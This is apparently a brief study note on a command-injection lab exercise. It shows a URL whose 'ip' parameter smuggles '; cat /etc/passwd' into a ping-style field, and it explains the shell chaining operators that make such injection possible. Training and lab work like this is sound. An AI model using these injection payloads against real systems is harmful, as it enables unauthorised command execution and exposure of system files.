0uthor: Pawel Werner
e-mail: pawel.k.werner@gmail.com
linkedin: https://www.linkedin.com/in/pawe%C5%82-werner-31b40a53/

*************** Command execution ***************

1. http://ptl-4b0befae-1591ed7f.libcurl.so/?ip=127.0.0.1
a. http://ptl-4b0befae-1591ed7f.libcurl.so/?ip=127.0.0.1%20;%20cat%20/etc/passwd (adding command)

command1 && command2 that will run command2 if command1 succeeds.
command1 || command2 that will run command2 if command1 fails.
command1 ; command2 that will run command1 then command2.
command1 | command2 that will run command1 and send the output of command1 to command2.
